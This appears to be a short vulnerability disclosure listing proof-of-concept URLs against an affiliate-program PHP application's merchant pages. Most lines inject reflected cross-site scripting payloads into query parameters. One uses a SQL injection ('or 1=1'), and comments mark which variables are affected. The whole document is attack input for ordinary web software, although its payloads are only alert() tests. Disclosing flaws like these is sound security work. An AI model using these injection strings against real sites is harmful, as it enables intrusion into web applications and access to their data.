http://www.example.com/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>

http://www.example.com/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>

http://www.example.com/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS

http://www.example.com/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all variables XSS affected except Act

http://www.example.com/affiliate/merchants/index.php?Act=
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date
"><script>alert()</script>

http://www.example.com/affiliate/merchants/index.php?Act=
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007
&programs=All // all variables XSS affceted except Act y sub

http://www.example.com/affiliate/merchants/temp.php?rowid=
5"><script>alert()</script> // posible SQL too

http://www.example.com/affiliate/merchants/index.php?Act=
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>
&modofpay=Authorize.net&bankname=&bankno=&
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=